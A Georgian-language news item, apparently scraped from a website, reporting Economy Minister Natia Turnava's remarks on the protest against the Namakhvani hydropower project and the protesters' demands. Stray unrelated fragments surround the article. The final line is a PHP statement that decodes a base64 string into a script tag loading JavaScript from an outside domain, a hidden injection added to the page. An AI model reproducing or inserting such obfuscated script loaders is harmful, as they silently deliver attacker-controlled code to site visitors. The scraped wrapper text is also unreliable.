celsiusi
ავერსი შნაიდერი
"მიწისძვრებზე, სეისმურ საკითხებსა და კაშხლების მდგრადობაზე მეგაფონებით ვერ ვიმსჯელებთ", - ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ „ნამახვანჰესის“ საწინააღმდეგო პროტესტის კომენტირებისას განაცხადა.
 
„მთავარი მოთხოვნა არის, რომ „ნამახვანი“ იყოს უფრო კარგად გათვლილი და უსაფრთხო პროექტი. ჩვენ ამაზე ვმუშაობთ მოსახლეობასთან ერთად; მათ შორის მზად ვართ, ვიმუშაოთ რიონის ხეობის მცველებთან და აქტივისტებთან ერთად, რომ ეს პროექტი საბოლოოდ იყოს ისეთი, რომელიც არანაირ კითხვას აღარ გაიწვევს. ორი პლატფორმა შევთავაზეთ სასაუბროდ. მსგავსი საკითხები წყდება ექსპერტების ჩართულობით, სეისმიკაზე, მიწისძვრებზე, კაშხლების მდგრადობაზე მეგაფონებით და აქციების დროს ვერ ვიმსჯელებთ“, - განაცხადა თურნავამ.
 
რაც შეეხება გუშინ გავრცელებულ დოკუმენტაციას, რომლის თანახმად, იუსტიციის სამინისტროს გაცემული აქვს დოკუმენტი, სადაც „ნამახვანჰესის“ პროექტზე 22 შენიშვნაა გაცემული, მინისტრი ასე პასუხობს: „ერთი წამითაც რომ მეეჭვებოდეს, რომ დამოუკიდებელი, ეკონომიკურად გაძლიერებული საქართველოს ინტერესი არ გადის დამოუკიდებელ ენერგეტიკაზე და ამისთვის „ნამახვანის“ სტრატეგიული პროექტი საჭირო არაა, მე აქ თქვენს წინაშე არ ვიქნებოდი“.
 
„ნამახვანჰესის“ საწინააღმდეგო აქცია უკვე სამი დღეა დედაქალაქში მიმდინარეობს, თუმცა პროტესტის მონაწილეები დღეს სოფელ გუმათში აპირებენ დაბრუნებას. მათ რამდენიმე მოთხოვნა აქვთ. მათ შორისაა გადადგეს ეკონომიკის მინისტრი ნათია თურნავა და გაწყდეს ხელშეკრულება კომპანია „ენკასთან“.
1203
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");